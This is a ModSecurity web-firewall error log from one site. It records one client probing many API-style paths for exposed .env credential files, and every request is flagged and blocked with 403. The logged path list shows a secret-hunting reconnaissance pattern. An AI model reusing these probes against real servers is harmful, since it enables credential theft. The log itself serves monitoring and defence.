[Mon May 11 14:10:06.038971 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/v3/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBAwAAAQ4"]
[Mon May 11 14:10:06.039145 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/v3/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBAwAAAQ4"]
[Mon May 11 14:10:06.039413 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/v3/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBAwAAAQ4"]
[Mon May 11 14:10:06.207882 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/v1/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBAAAAQ4"]
[Mon May 11 14:10:06.208285 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/v1/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBAAAAQ4"]
[Mon May 11 14:10:06.208471 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/v1/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBAAAAQ4"]
[Mon May 11 14:10:06.208711 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/v1/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBAAAAQ4"]
[Mon May 11 14:10:06.416024 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/v2/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBgAAAQ4"]
[Mon May 11 14:10:06.416413 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/v2/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBgAAAQ4"]
[Mon May 11 14:10:06.416608 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/v2/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBgAAAQ4"]
[Mon May 11 14:10:06.416834 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/v2/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBgAAAQ4"]
[Mon May 11 14:10:06.599727 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/rest/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBwAAAQ4"]
[Mon May 11 14:10:06.600070 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/rest/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBwAAAQ4"]
[Mon May 11 14:10:06.600260 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/rest/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBwAAAQ4"]
[Mon May 11 14:10:06.600490 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/rest/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBBwAAAQ4"]
[Mon May 11 14:10:06.823633 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/graphql/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBCAAAAQ4"]
[Mon May 11 14:10:06.824019 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/graphql/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBCAAAAQ4"]
[Mon May 11 14:10:06.824215 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/graphql/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBCAAAAQ4"]
[Mon May 11 14:10:06.824452 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/graphql/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBCAAAAQ4"]
[Mon May 11 14:10:06.992536 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/gateway/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBCQAAAQ4"]
[Mon May 11 14:10:06.992963 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/gateway/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBCQAAAQ4"]
[Mon May 11 14:10:06.993175 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/gateway/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBCQAAAQ4"]
[Mon May 11 14:10:06.993419 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/gateway/.env"] [unique_id "agHHHlchVQ3tCn0m9OpBCQAAAQ4"]
[Mon May 11 14:10:07.201954 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/microservice/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBCgAAAQ4"]
[Mon May 11 14:10:07.202386 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/microservice/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBCgAAAQ4"]
[Mon May 11 14:10:07.202577 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/microservice/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBCgAAAQ4"]
[Mon May 11 14:10:07.202856 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/microservice/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBCgAAAQ4"]
[Mon May 11 14:10:07.406316 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/service/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBCwAAAQ4"]
[Mon May 11 14:10:07.406705 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/service/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBCwAAAQ4"]
[Mon May 11 14:10:07.406890 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/service/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBCwAAAQ4"]
[Mon May 11 14:10:07.407142 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/service/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBCwAAAQ4"]
[Mon May 11 14:10:07.659801 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/api/v3/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBDAAAAQ4"]
[Mon May 11 14:10:07.660207 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/api/v3/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBDAAAAQ4"]
[Mon May 11 14:10:07.660400 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/api/v3/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBDAAAAQ4"]
[Mon May 11 14:10:07.660665 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/api/v3/.env"] [unique_id "agHHH1chVQ3tCn0m9OpBDAAAAQ4"]
